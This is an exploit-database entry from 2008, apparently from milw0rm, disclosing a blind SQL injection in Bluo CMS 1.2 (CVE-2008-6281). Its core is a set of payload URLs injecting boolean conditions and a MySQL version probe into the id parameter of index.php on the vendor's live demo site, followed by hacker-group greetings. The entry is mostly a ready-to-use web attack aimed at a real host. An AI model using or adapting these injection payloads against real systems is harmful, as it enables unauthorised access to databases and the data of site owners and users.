Bluo CMS 1.2 - Blind SQL Injection
Author: The_5p3ctrum
type: webapps
platform: php
port:
date_added: 2008-11-27
date_updated: 2017-01-04
verified: 1
codes: OSVDB-50381;CVE-2008-6281
tags:
aliases:
screenshot_url:
application_url:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
Bluo cms 1.2 blind sql injection Vulnerability +
+
Discovered by : The_5p3ctrum +
Contact AUTHOR: sp3[at]linuxmail.org & 5p[at]linuxmail.org + +
+
Mor0ccan Nightmares +
+
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#####################################################
APPLICATION : bluocms
DOWNLOAD(299 $): http://www.bluocms.com/shop.php
VENDOR : http://www.bluocms.com
DEMO : http://www.bluocms.com/demo
#####################################################
[+] vuln : blind sql injection
[+] Exploit :
true:
http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=5
http://www.bluocms.com/demo/index.php?id=511 and 1=1
false:
http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=4
http://www.bluocms.com/demo/index.php?id=511 and 1=2
##########################################################################################################
#
# Greetings: str0ke, BayHay, Cyber-Zone, Drackanz, The_leo, The_Casper, Fucker_Net, And All my friends #
#
##########################################################################################################
# milw0rm.com [2008-11-28]